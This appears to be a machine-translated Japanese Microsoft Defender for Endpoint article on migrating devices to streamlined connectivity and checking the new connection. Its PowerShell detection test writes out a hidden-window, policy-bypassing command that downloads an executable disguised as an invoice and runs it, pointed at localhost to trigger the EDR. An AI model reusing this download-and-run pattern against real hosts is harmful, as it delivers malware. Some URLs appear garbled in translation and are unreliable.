合理化された接続方法を使用するようにデバイスを移行する
適用対象:
- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2
- Microsoft Defender XDR
この記事では、以前に Defender for Endpoint にオンボードされていたデバイスを移行 (再オンボード) して、合理化されたデバイス接続方法を使用する方法について説明します。 合理化された接続の詳細については、「合理化された接続 を使用したデバイスのオンボード」を参照してください。 デバイスは、「 合理化された接続」に記載されている前提条件を満たしている必要があります。
ほとんどの場合、再オンボード時に完全なデバイスのオフボードは必要ありません。 更新されたオンボード パッケージを実行し、デバイスを再起動して接続を切り替えることができます。 個々のオペレーティング システムの詳細については、次の情報を参照してください。
重要
制限事項と既知の問題:
- 移行の進行状況を追跡できるように、高度なハンティングで
DeviceInfo table列を設定ConnectivityTypeすることに関するバックエンドの問題が見つかりました。 この問題をできるだけ早く解決することを目指しています。 - デバイスの移行 (再オンボード) の場合: オフボードは、合理化された接続方法に切り替える必要はありません。 更新されたオンボード パッケージが実行されると、Windows デバイスでは完全なデバイスの再起動が必要になり、macOS と Linux の場合はサービスの再起動が必要になります。 詳細については、この記事に含まれる詳細を参照してください。
- Windows 10 バージョン 1607、1703、1709、および 1803 では、再オンボードはサポートされていません。 最初にオフボードしてから、更新されたパッケージを使用してオンボードします。 これらのバージョンでは、より長い URL リストも必要です。
- MMA エージェントを実行しているデバイスはサポートされていないため、引き続き MMA オンボード方法を使用する必要があります。
合理化された方法を使用したデバイスの移行
移行に関する推奨事項
小さく始めます。 最初に少数のデバイス セットから開始することをお勧めします。 サポートされているデプロイ ツールのいずれかを使用してオンボード BLOB を適用し、接続を監視します。 新しいオンボード ポリシーを使用している場合は、競合を防ぐために、他の既存のオンボード ポリシーからデバイスを除外してください。
検証と監視。 デバイスの小さなセットをオンボードした後、デバイスが正常にオンボードされ、サービスと通信していることを検証します。
移行を完了します。 この段階では、より大きなデバイス セットへの移行を段階的にロールアウトできます。 移行を完了するには、以前のオンボード ポリシーを置き換え、古い URL をネットワーク デバイスから削除します。
移行を続行する前に 、デバイスの前提条件 を検証します。 この情報は、既存のデバイスの移行に焦点を当てて、前の記事に基づいています。
デバイスを再オンボードするには、合理化されたオンボード パッケージを使用する必要があります。 パッケージにアクセスする方法の詳細については、「 効率的な接続」を参照してください。
OS によっては、オンボード パッケージが適用されると、移行でデバイスの再起動またはサービスの再起動が必要になる場合があります。
Windows: デバイスを再起動する
macOS: デバイスを再起動するか、次を実行して Defender for Endpoint サービスを再起動します。
sudo launchctl unload /Library/LaunchDaemons/com.microsoft.fresno.plistsudo launchctl load /Library/LaunchDaemons/com.microsoft.fresno.plist
Linux: 次を実行して Defender for Endpoint サービスを再起動します。
sudo systemctl restart mdatp
次の表に、デバイスのオペレーティング システムに基づく使用可能なオンボード ツールの移行手順を示します。
Windows 10と 11
重要
バージョン 1607、1703、1709、1803 Windows 10は、再オンボードをサポートしていません。 既存のデバイスを移行するには、合理化されたオンボード パッケージを使用して完全にオフボードしてオンボードする必要があります。
Windows クライアント デバイスのオンボードに関する一般的な情報については、「 Windows クライアントのオンボード」を参照してください。
前提条件が満たされていることを確認する: 合理化された方法を使用するための前提条件。
ローカル スクリプト
合理化されたオンボード パッケージを使用して、 ローカル スクリプト (最大 10 台のデバイス) のガイダンスに従います。 手順を完了したら、デバイス接続を切り替えるためにデバイスを再起動する必要があります。
グループ ポリシー
合理化されたオンボード パッケージを使用して 、グループ ポリシー のガイダンスに従います。 手順を完了したら、デバイス接続を切り替えるためにデバイスを再起動する必要があります。
Microsoft Intune
合理化されたオンボード パッケージを使用Intuneのガイダンスに従ってください。 "コネクタから自動" オプションを使用できます。ただし、このオプションはオンボード パッケージを自動的に再適用しません。 新しいオンボード ポリシーをCreateし、最初にテスト グループをターゲットにします。 手順を完了したら、デバイス接続を切り替えるためにデバイスを再起動する必要があります。
Microsoft 構成マネージャー
Configuration Managerのガイダンスに従ってください。
Vdi
「非永続的仮想デスクトップ インフラストラクチャ (VDI) デバイスのオンボード」のガイダンスを使用します。 手順を完了したら、デバイス接続を切り替えるためにデバイスを再起動する必要があります。
移行されたデバイスの合理化された方法によるデバイス接続の検証
次の方法を使用して、Windows デバイスを正常に接続したことをチェックできます。
- クライアント アナライザー
- Microsoft Defender XDRでの高度なハンティングによる追跡
- イベント ビューアーを使用してローカルで追跡する (Windows の場合)
- テストを実行して Defender for Endpoint サービスとの接続を確認する
- レジストリ エディターの確認
- PowerShell 検出テスト
macOS と Linux の場合は、次の方法を使用できます。
- MDATP 接続テスト
- Microsoft Defender XDRでの高度なハンティングによる追跡
- テストを実行して Defender for Endpoint サービスとの接続を確認する
Defender for Endpoint Client Analyzer (Windows) を使用して、移行されたエンドポイントのオンボード後に接続を検証する
オンボードしたら、MDE Client Analyzer を実行して、デバイスが適切な更新された URL に接続していることを確認します。
Defender for Endpoint センサーが実行されているMicrosoft Defender for Endpoint クライアント アナライザー ツールをダウンロードします。
サービスへのクライアント接続の確認に関するページと同じ手順Microsoft Defender for Endpoint従うことができます。 このスクリプトでは、デバイスで構成されたオンボード パッケージが自動的に使用され (合理化されたバージョンにする必要があります)、接続をテストします。
適切な URL を使用して接続が確立されていることを確認します。
Microsoft Defender XDRでの高度なハンティングによる追跡
ポータルで高度なハンティングMicrosoft Defender使用して、接続の種類の状態を表示できます。
この情報は、DeviceInfo テーブルの "ConnectivityType" 列にあります。
- 列名: ConnectivityType
- 使用可能な値:
<blank>、合理化、標準 - データ型: 文字列
- 説明: デバイスからクラウドへの接続の種類
合理化された方法を使用するようにデバイスが移行され、デバイスが制御チャネル & EDR コマンドとの正常な通信を確立すると、値は "Streamlined" として表されます。
デバイスを通常のメソッドに戻すと、値は "standard" になります。
まだ再オンボードを試みていないデバイスの場合、値は空白のままです。
Windows イベント ビューアーを使用してデバイス上でローカルに追跡する
Windows イベント ビューアーの SENSE 操作ログを使用して、新しい合理化されたアプローチで接続をローカルで検証できます。 SENSE イベント ID 4 は、成功した EDR 接続を追跡します。
次の手順に従って、Defender for Endpoint サービス イベント ログを開きます。
[Windows] メニューの [スタート] を選択し、「イベント ビューアー」と入力します。 次に、[イベント ビューアー] を選択します。
ログの一覧の [ ログの概要] で、 Microsoft-Windows-SENSE/Operational が表示されるまで下にスクロールします。 この項目をダブルクリックしてログを開きます。
![[ログの概要] セクションを含むイベント ビューアーのスクリーンショット](media/log-summary-event-viewer.png)
[アプリケーションとサービス ログ] Microsoft>Windows>SENSE を展開して [運用] を選択して、ログ>にアクセスすることもできます。
イベント ID 4 は、Defender for Endpoint Command & Control チャネルとの正常な接続を追跡します。 更新された URL を使用して接続が成功したことを確認します。 例:
Contacted server 6 times, all succeeded, URI: <region>.<geo>.endpoint.security.microsoft.com. <EventData> <Data Name="UInt1">6</Data> <Data Name="Message1">https://<region>.<geo>.endpoint.security.microsoft.com> </EventData>メッセージ 1 には、連絡先の URL が含まれています。 イベントに合理化された URL (endpoint.security.microsoft、com) が含まれていることを確認します。
イベント ID 5 は、該当する場合にエラーを追跡します。
注:
SENSE は、Microsoft Defender for Endpoint を動作させる動作センサーを指して使用される内部名です。
サービスによって記録されたイベントがログに表示されます。
詳細については、「イベント ビューアーを使用してイベントとエラーを確認する」を参照してください。
テストを実行して Defender for Endpoint サービスとの接続を確認する
デバイスが Defender for Endpoint にオンボードされたら、引き続きデバイス インベントリに表示されることを確認します。 DeviceID は変わりません。
[デバイス ページ のタイムライン] タブを確認して、デバイスからイベントが流れているかどうかを確認します。
ライブ応答
ライブ応答がテスト デバイスで動作していることを確認します。 「ライブ応答を使用してデバイス上のエンティティを調査する」の手順に従います。
接続 (cd、ジョブ、接続など) を確認するには、接続後にいくつかの基本的なコマンドを実行してください。
自動調査および対応
テスト デバイスで自動調査と応答が機能していることを確認する: 自動調査と応答の機能を構成します。
Auto-IR テスト ラボの場合は、Microsoft Defender XDR>Evaluations & Tutorials Tutorials>& Simulations> **Tutorials >Automated Investigation tutorials に移動します。
クラウドによる保護
管理者としてコマンド プロンプトを開きます。
[スタート] メニューの項目を右クリックし、[ 管理者として実行 ] を選択し、アクセス許可プロンプトで [ はい ] を選択します。
Microsoft Defenderウイルス対策コマンド ライン ユーティリティ (mpcmdrun.exe) で次の引数を使用して、ネットワークがMicrosoft Defenderウイルス対策クラウド サービスと通信できることを確認します。
"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -ValidateMapsConnection
注:
このコマンドは、Windows 10、バージョン 1703 以降、またはWindows 11でのみ機能します。 詳細については、「mpcmdrun.exe コマンド ライン ツールを使用してMicrosoft Defenderウイルス対策を管理する」を参照してください。
一目でブロックをテストする
「Microsoft Defender for Endpoint Block at First Sight (BAFS) のデモ」の手順に従います。
SmartScreen をテストする
Microsoft Defender SmartScreen Demo (msft.net) の手順に従います。
PowerShell 検出テスト
Windows デバイスで、フォルダーを作成します:
C:\test-MDATP-test。管理者としてコマンド プロンプト ウィンドウを開きます。
コマンド プロンプト ウィンドウで、次の PowerShell コマンドを実行します:
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
コマンドを実行すると、コマンド プロンプト ウィンドウが自動的に閉じます。 成功した場合、検出テストは完了としてマークされます。
macOS と Linux の場合は、次の方法を使用できます。
- MDATP 接続テスト
- Microsoft Defender XDRでの高度なハンティングによる追跡
- テストを実行して Defender for Endpoint サービスとの接続を確認する
MDATP 接続テスト (macOS および Linux)
を実行 mdatp health -details features して、simplified_connectivity "enabled" を確認します。
を実行 mdatp health -details edr して、使用可能であることを確認 edr_partner_geo_location します。 値は、"geo" がテナントの geo の場所である必要があります GW_<geo> 。
mdatp 接続テストを実行します。 合理化された URL パターンが存在することを確認します。 '\storage' には 2 つ、1 つは '\mdav' 用、1 つは '\xplat' 用、もう 1 つは '/packages' 用です。
例: https:mdav.us.endpoint.security.microsoft/com/storage
Microsoft Defender XDRでの高度なハンティングによる追跡
Windows の場合と同じ手順に従います。
Defender for Endpoint Client Analyzer (クロスプラットフォーム) を使用して、新しく移行されたエンドポイントの接続を検証する
macOS または Linux 用のクライアント アナライザーをダウンロードして実行します。 詳細については、「 クライアント アナライザーをダウンロードして実行する」を参照してください。
MDEClientAnalyzer フォルダー内から実行
mdeclientanalyzer.cmd -o <path to cmd file>します。 コマンドでは、オンボード パッケージのパラメーターを使用して接続をテストします。を実行
mdeclientanalyzer.cmd -g <GW_US, GW_UK, GW_EU>します (ここで、パラメーターはGW_US、GW_EU、GW_UK)。 GW は合理化されたオプションを指します。 該当するテナント geo を使用して実行します。
フィードバック
以下は間もなく提供いたします。2024 年を通じて、コンテンツのフィードバック メカニズムとして GitHub の issue を段階的に廃止し、新しいフィードバック システムに置き換えます。 詳細については、「https://aka.ms/ContentUserFeedback」を参照してください。
フィードバックの送信と表示